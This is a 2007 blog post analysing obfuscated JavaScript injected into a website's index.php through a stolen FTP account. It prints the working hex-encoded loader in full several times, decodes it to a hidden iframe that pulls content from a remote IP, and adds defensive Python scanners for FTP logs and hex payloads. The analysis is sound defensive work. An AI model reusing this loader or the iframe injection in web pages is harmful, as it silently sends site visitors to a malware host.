Sugree

Malicious code in index.php

I got a report about a security issue in some web pages: several anti-virus products were flagging them as containing a trojan. After looking at the code in detail, I found the code below in index.php.

<script>function v475ecab335e87(v475ecab336686){ function v475ecab336e79 () {var v475ecab337941=16; return v475ecab337941;} return(parseInt(v475ecab336686,v475ecab336e79()));}function v475ecab338244(v475ecab338637){ function v475ecab33922b () {var v475ecab339627=2; return v475ecab339627;} var v475ecab338a3c='';for(v475ecab338e2e=0; v475ecab338e2e<v475ecab338637.length; v475ecab338e2e+=v475ecab33922b()){ v475ecab338a3c+=(String.fromCharCode(v475ecab335e87(v475ecab338637.substr(v475ecab338e2e, v475ecab33922b()))));}return v475ecab338a3c;} document.write(v475ecab338244('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65613862207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3335373132292B273435356465643433645C272077696474683D3732206865696768743D343936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

Note that, according to xferlog, this file had been updated within the last 2 days.

Wed Dec 12 00:38:02 2007 1 77.221.133.186 0 /var/www/www.xxxxxxxx.xx.th/www/index.php a _ i r xxxxxx ftp 0 * i

That means this file was modified by someone at 77.221.133.186 (Russia) over FTP, using the existing user xxxxxx (CEN). In other words, this user's password had been leaked for a while. After removing the code from index.php, I tried to understand how it works.
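As an added example (not from the original post), a small Python check over xferlog that flags incoming uploads of the usual injection targets from hosts outside an assumed allowlist. The first sample line is the one quoted above; the other two lines and the 192.0.2.0/24 allowlist are constructed for the example.

```python
import ipaddress
from collections import namedtuple

# Constructed sample xferlog: the first record is the one quoted on the page,
# the other two are made-up benign entries for contrast.
SAMPLE_XFERLOG = """\
Wed Dec 12 00:38:02 2007 1 77.221.133.186 0 /var/www/www.xxxxxxxx.xx.th/www/index.php a _ i r xxxxxx ftp 0 * i
Wed Dec 12 09:15:40 2007 2 192.0.2.10 4210 /var/www/www.xxxxxxxx.xx.th/www/index.php a _ i r xxxxxx ftp 0 * c
Wed Dec 12 09:16:02 2007 1 192.0.2.10 18233 /var/www/www.xxxxxxxx.xx.th/www/images/logo.png b _ o r xxxxxx ftp 0 * c
"""

# Assumed allowlist of networks the maintainers upload from (192.0.2.0/24 is a documentation range).
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]
# Files the automated injector overwrites, as listed in the comment on this page.
TARGET_NAMES = {"index.php", "index.html", "index.htm", "login.php", "login.htm", "default.htm"}

Xfer = namedtuple("Xfer", "when secs host size path ttype action direction mode user service auth authuser status")

def parse_xferlog_line(line):
    """Split one xferlog record (wu-ftpd/proftpd layout). The first eight and the last
    nine fields are fixed; whatever lies between is the filename, which may contain spaces."""
    t = line.split()
    if len(t) < 18:
        return None
    return Xfer(" ".join(t[:5]), int(t[5]), t[6], int(t[7]), " ".join(t[8:-9]), *t[-9:])

def is_trusted(host):
    """True when the remote host falls inside one of the allowlisted networks."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_NETS)

def suspicious_uploads(log_text):
    """Return uploads (direction 'i') of injector target files coming from untrusted hosts."""
    hits = []
    for line in log_text.splitlines():
        x = parse_xferlog_line(line)
        if x and x.direction == "i" and x.path.rsplit("/", 1)[-1] in TARGET_NAMES and not is_trusted(x.host):
            hits.append(x)
    return hits

if __name__ == "__main__":
    for hit in suspicious_uploads(SAMPLE_XFERLOG):
        print(hit.when, hit.host, hit.user, hit.path)
```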

The first step is to add indentation. I like beautiful code.

function v475ecab335e87(v475ecab336686){
  function v475ecab336e79 () {
    var v475ecab337941=16;
    return v475ecab337941;
  }
  return(parseInt(v475ecab336686,v475ecab336e79()));
}
 
function v475ecab338244(v475ecab338637){ 
  function v475ecab33922b () {
    var v475ecab339627=2; 
    return v475ecab339627;
  } 
  var v475ecab338a3c='';
  for(v475ecab338e2e=0; v475ecab338e2e<v475ecab338637.length; v475ecab338e2e+=v475ecab33922b()){ 
    v475ecab338a3c+=(String.fromCharCode(v475ecab335e87(v475ecab338637.substr(v475ecab338e2e, v475ecab33922b()))));
  }
  return v475ecab338a3c;
}

document.write(v475ecab338244('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65613862207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3335373132292B273435356465643433645C272077696474683D3732206865696768743D343936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

Most of the code is just scrambled names, so it is easier to rename the variables and functions.

function parseHex(i){
  var j=16;
  return(parseInt(i,j));
}
 
function decode(i){
  var j = 2;
  var s='';
  for(var k=0; k<i.length; k+=j){
    s+=(String.fromCharCode(parseHex(i.substr(k, j))));
  }
  return s;
}
 
document.write(decode('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65613862207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3335373132292B273435356465643433645C272077696474683D3732206865696768743D343936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

OK, now I know that the long text is just hex-encoded. Time for Python.

import re
s = '3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65613862207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3335373132292B273435356465643433645C272077696474683D3732206865696768743D343936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'
# replace every pair of hex digits with the character it encodes
print(re.sub(r'(..)', lambda m: chr(int(m.group(1), 16)), s))

<SCRIPT>window.status='Done';document.write('<iframe name=ea8b src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*35712)+'455ded43d\' width=72 height=496 style=\'display: none\'></iframe>')</SCRIPT>

The decoded script is as follows.

window.status='Done';
document.write('<iframe name=ea8b src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*35712)+'455ded43d\' width=72 height=496 style=\'display: none\'></iframe>')

That is enough. Now I have 2 IP addresses.
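As an added example (not from the original post), the decoding step above generalised into a Python scanner: it finds long quoted hex literals inside script tags, decodes them the same way the malicious decode() does, and reports any iframe the decoded script would write, its host and whether it is hidden. The sample HTML is constructed around the hex string from this page.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a page carrying the obfuscated <script> from index.php,
# with only the document.write() call kept (the hex string is the one from the page).
HEX_PAYLOAD = ("3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65613862207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3335373132292B273435356465643433645C272077696474683D3732206865696768743D343936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E")
SAMPLE_HTML = ("<html><body><p>hello</p><script>/* decoder functions omitted */"
               "document.write(d('" + HEX_PAYLOAD + "'));</script></body></html>")

HEX_STRING = re.compile(r"['\"]((?:[0-9A-Fa-f]{2}){20,})['\"]")  # quoted hex, 40+ digits
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
SRC = re.compile(r"src=\\?['\"]([^'\"\\]+)", re.IGNORECASE)        # tolerates the \' escaping

def hex_to_text(hexstr):
    """Decode a run of hex byte pairs, the same transform as the malicious decode()."""
    return bytes.fromhex(hexstr).decode("latin-1")

def find_hex_payloads(html):
    """Return every long quoted hex literal found inside <script> tags."""
    scripts = re.findall(r"<script\b[^>]*>(.*?)</script>", html, re.IGNORECASE | re.DOTALL)
    return [m for s in scripts for m in HEX_STRING.findall(s)]

def iframes_in(text):
    """List (url, host, hidden) for each <iframe> whose src starts with a literal URL."""
    found = []
    for attrs in IFRAME.findall(text):
        m = SRC.search(attrs)
        if not m:
            continue
        url = m.group(1)
        hidden = re.search(r"display:\s*none", attrs) is not None
        found.append((url, urlparse(url).hostname, hidden))
    return found

def analyze(html):
    """Decode hex payloads in a page and report the iframe injections they would write."""
    report = []
    for payload in find_hex_payloads(html):
        for url, host, hidden in iframes_in(hex_to_text(payload)):
            report.append({"url": url, "host": host, "hidden": hidden})
    return report

if __name__ == "__main__":
    for hit in analyze(SAMPLE_HTML):
        print(hit)
```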

Submitted by sugree on Fri, 12/14/2007 - 11:59

Thank you for such a great analysis.

The same thing happened to a couple of our sites.

It is a kind of automated tool that crawls your site over FTP and downloads, injects and uploads any of (index.php, index.html, index.htm, login.php, login.htm, default.htm).

I suspect that the account user/pass was stolen by a trojan a long time ago.

Regards
